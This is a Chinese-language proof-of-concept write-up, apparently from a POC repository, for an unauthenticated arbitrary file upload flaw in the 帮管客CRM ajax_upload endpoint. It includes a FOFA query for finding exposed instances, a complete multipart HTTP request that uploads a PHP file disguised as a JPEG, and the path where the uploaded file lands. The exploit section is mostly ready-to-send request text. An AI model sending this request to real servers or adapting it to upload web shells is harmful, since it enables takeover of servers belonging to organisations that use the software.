POC/wpoc/帮管客CRM/帮管客CRMajax_upload存在任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

48 lines
1.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 帮管客CRM ajax_upload存在任意文件上传漏洞
# 一、漏洞简介
帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统客户管理从未如此简单一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化.帮管客CRM ajax_upload_chat、ajax_upload等接口处存在文件上传漏洞未经授权的攻击者可利用该漏洞获取服务器权限。
# 二、影响版本
+ 帮管客CRM
# 三、资产测绘
+ fofa`app="帮管客-CRM"`
+ 特征
![1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc.png](./img/-q9KN7Vz-WxptVyQ/1706689730844-244c90a3-963a-47a3-ab90-419f4b5c87bc-081759.png)
# 四、漏洞复现
```plain
POST /index.php/upload/ajax_upload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv1WbOn5o
------WebKitFormBoundaryv1WbOn5o
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php
phpinfo();unlink(__FILE__);
------WebKitFormBoundaryv1WbOn5o--
```
![1706690699374-5bb1431f-958f-4d90-8541-9938e4c2a1d4.png](./img/-q9KN7Vz-WxptVyQ/1706690699374-5bb1431f-958f-4d90-8541-9938e4c2a1d4-672428.png)
上传文件位置
```plain
//data//uploads//202401//202401311642767GFUPHdsA.php
```
![1706690729835-bf862932-a71e-4dd3-b157-3cd0f62be938.png](./img/-q9KN7Vz-WxptVyQ/1706690729835-bf862932-a71e-4dd3-b157-3cd0f62be938-486853.png)
> 更新: 2024-02-29 23:55:41
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gx3kacfb8q9w0bdb>